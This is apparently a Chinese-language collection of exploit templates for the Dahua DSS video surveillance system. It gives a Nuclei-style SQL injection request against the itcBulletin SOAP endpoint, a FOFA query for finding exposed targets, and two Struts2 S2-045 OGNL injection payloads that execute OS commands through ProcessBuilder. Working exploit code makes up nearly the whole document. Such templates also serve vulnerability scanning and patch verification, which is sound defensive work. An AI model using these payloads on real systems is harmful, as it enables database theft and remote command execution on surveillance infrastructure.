大华 DSS SQL注入以及struts2 OGNL表达式注入

http://your-ip/portal/services/itcBulletin?wsdl

id: dahua-dss-itcBulletin-sqliinfo:  name: 大华DSS itcBulletin SQL注入漏洞  author: fgz  severity: high  description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞，攻击者可以利用该漏洞获取数据库敏感信息。  metadata:    fofa-query: app="dahua-DSS"requests:  - raw:      - |+        POST /portal/services/itcBulletin?wsdl HTTP/1.1        Host: {{Hostname}}        Accept-Encoding: gzip        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        <s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>          <s11:Body>            <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>              <netMarkings>                (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1              </netMarkings>            </ns1:deleteBulletin>          </s11:Body>        </s11:Envelope>    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'

POST /admin/login_login.action HTTP/1.1Connection: keep-aliveuser-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Charsert: GB2312Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9zCache-Control: no-cachePragma: no-cacheHost: xx.xx.xx.xxAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 1022------WebKitFormBoundaryAnmUgTEhFhOZpr9zContent-Disposition: form-data; name="pocfile"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo test').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

id: dahua-dss-s2-045-rceinfo:  name: dahua-dss-s2-045-rce  author: xxx  severity: high  description: dahua-dss-s2-045-rce  tags: dahua-dssvariables:  randtxt: "{{to_lower(rand_text_alpha(8))}}"http:  - raw:      - |                      GET /admin/login_login.action HTTP/1.1        Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo {{randtxt}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}        Cookie: JSESSIONID=281F258E40BD1B32C20AA1E2FBC32A15; JSESSIONID=8ED7F0032B2552FBBA811F1EE83BA279        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8        Accept-Encoding: gzip,deflate,br        Host: {{Hostname}}        Connection: Keep-alive    matchers:           - type: dsl        name: s2-045-rce        dsl:          - "status_code_1 == 200 && contains(body,'{{randtxt}}')"